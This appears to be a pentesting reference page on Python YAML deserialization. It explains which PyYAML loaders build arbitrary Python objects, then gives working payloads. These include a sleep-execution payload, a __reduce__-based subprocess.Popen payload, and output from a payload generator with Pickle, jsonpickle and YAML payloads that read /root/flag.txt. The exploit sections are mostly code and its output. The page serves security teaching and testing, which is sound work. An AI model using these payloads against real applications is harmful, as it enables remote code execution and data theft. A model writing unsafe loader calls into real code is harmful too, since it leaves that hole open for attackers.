124 lines
4.3 KiB
Markdown
124 lines
4.3 KiB
Markdown
|
# Python Yaml Deserialization
|
|||
|
|
|||
|
## Yaml **Deserialization**
|
|||
|
|
|||
|
**Yaml **python libraries is also capable to** serialize python objects** and not just raw data:
|
|||
|
|
|||
|
```
|
|||
|
print(yaml.dump(str("lol")))
|
|||
|
lol
|
|||
|
...
|
|||
|
|
|||
|
print(yaml.dump(tuple("lol")))
|
|||
|
!!python/tuple
|
|||
|
- l
|
|||
|
- o
|
|||
|
- l
|
|||
|
|
|||
|
print(yaml.dump(range(1,10)))
|
|||
|
!!python/object/apply:builtins.range
|
|||
|
- 1
|
|||
|
- 10
|
|||
|
- 1
|
|||
|
```
|
|||
|
|
|||
|
Check how the **tuple** isn’t a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins).
|
|||
|
|
|||
|
![](<../../.gitbook/assets/image (628).png>)
|
|||
|
|
|||
|
**safe\_load()** or **safe\_load\_all()** uses SafeLoader and **don’t support class object deserialization**. Class object deserialization example:
|
|||
|
|
|||
|
```python
|
|||
|
import yaml
|
|||
|
from yaml import UnsafeLoader, FullLoader, Loader
|
|||
|
data = b'!!python/object/apply:builtins.range [1, 10, 1]'
|
|||
|
|
|||
|
print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)
|
|||
|
print(yaml.load(data, Loader=Loader)) #range(1, 10)
|
|||
|
print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
|||
|
print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>
|
|||
|
print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
|
|||
|
print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
|
|||
|
print(yaml.unsafe_load(data)) #range(1, 10)
|
|||
|
print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
|||
|
print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
|||
|
|
|||
|
#The other ways to load data will through an error as they won't even attempt to
|
|||
|
#deserialize the python object
|
|||
|
```
|
|||
|
|
|||
|
The previous code used **unsafe\_load **to load the serialized python class. This is because in **version >= 5.1**, it doesn’t allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader.
|
|||
|
|
|||
|
### Basic Exploit
|
|||
|
|
|||
|
Example on how to **execute a sleep**:
|
|||
|
|
|||
|
```python
|
|||
|
import yaml
|
|||
|
from yaml import UnsafeLoader, FullLoader, Loader
|
|||
|
data = b'!!python/object/apply:time.sleep [2]'
|
|||
|
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
|
|||
|
print(yaml.load(data, Loader=Loader)) #Executed
|
|||
|
print(yaml.load_all(data))
|
|||
|
print(yaml.load_all(data, Loader=Loader))
|
|||
|
print(yaml.load_all(data, Loader=UnsafeLoader))
|
|||
|
print(yaml.load_all(data, Loader=FullLoader))
|
|||
|
print(yaml.unsafe_load(data)) #Executed
|
|||
|
print(yaml.full_load_all(data))
|
|||
|
print(yaml.unsafe_load_all(data))
|
|||
|
```
|
|||
|
|
|||
|
## RCE
|
|||
|
|
|||
|
Kindly note payload creation can be done with **any python YAML module (PyYAML or ruamel.yaml), in the same way**. The same payload can exploit both YAML module or any module based on PyYAML or ruamel.yaml
|
|||
|
|
|||
|
```python
|
|||
|
import yaml
|
|||
|
from yaml import UnsafeLoader, FullLoader, Loader
|
|||
|
import subprocess
|
|||
|
|
|||
|
class Payload(object):
|
|||
|
def __reduce__(self):
|
|||
|
return (subprocess.Popen,('ls',))
|
|||
|
|
|||
|
deserialized_data = yaml.dump(Payload()) # serializing data
|
|||
|
print(deserialized_data)
|
|||
|
|
|||
|
#!!python/object/apply:subprocess.Popen
|
|||
|
#- ls
|
|||
|
|
|||
|
print(yaml.load(deserialized_data, Loader=UnsafeLoader))
|
|||
|
print(yaml.load(deserialized_data, Loader=Loader))
|
|||
|
print(yaml.unsafe_load(deserialized_data))
|
|||
|
```
|
|||
|
|
|||
|
### Tool to create Payloads
|
|||
|
|
|||
|
The tool [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) can be used to generate python deserialization payloads to abuse **Pickle, PyYAML, jsonpickle and ruamel.yaml:**
|
|||
|
|
|||
|
```bash
|
|||
|
python3 peas.py
|
|||
|
Enter RCE command :cat /root/flag.txt
|
|||
|
Enter operating system of target [linux/windows] . Default is linux :linux
|
|||
|
Want to base64 encode payload ? [N/y] :
|
|||
|
Enter File location and name to save :/tmp/example
|
|||
|
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
|
|||
|
Done Saving file !!!!
|
|||
|
|
|||
|
cat /tmp/example_jspick
|
|||
|
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}
|
|||
|
|
|||
|
cat /tmp/example_pick | base64 -w0
|
|||
|
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==
|
|||
|
|
|||
|
cat /tmp/example_yaml
|
|||
|
!!python/object/apply:subprocess.Popen
|
|||
|
- !!python/tuple
|
|||
|
- cat
|
|||
|
- /root/flag.txt
|
|||
|
```
|
|||
|
|
|||
|
## References
|
|||
|
|
|||
|
For more in depth information about this technique read: [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
|